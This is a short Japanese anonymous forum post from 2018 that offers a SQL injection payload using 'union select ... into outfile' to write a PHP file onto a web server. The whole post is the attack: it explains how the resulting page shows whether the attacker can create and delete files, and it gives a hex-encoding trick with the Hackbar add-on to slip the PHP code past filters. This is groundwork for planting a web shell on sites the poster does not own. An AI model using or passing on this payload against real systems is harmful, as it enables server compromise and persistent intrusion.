569 無名弁護士 2018/05/31(木) 02:50:03.51 ID:uG6nx3Yr0
ハーイ
union select unlink_<?php echo(@unlink("/lol.php") ? "un"."linked" : "not_un"."linked" ?> into outfile 'lol.php'
SQLインジェクションでPHP作成可能か判別するやつ
unionのファイル結合を利用してinto outfileでファイル作成する
lol.phpにアクセスして404ならファイル作成不可
not_unlinkedって表示されたらファイル作成の権限はあるが削除権限は無い
unlinkedって表示されたらファイル作成と削除の権限がある
unlink_<?php〜 省略 〜?>のPHPの部分はHackbarのアドオンを入れてHEX Encodingするといいぞ
756e6c696e6b〜みたいになるから0x756e6c696e6b〜と先頭に0x付ければ16hと認識してくれる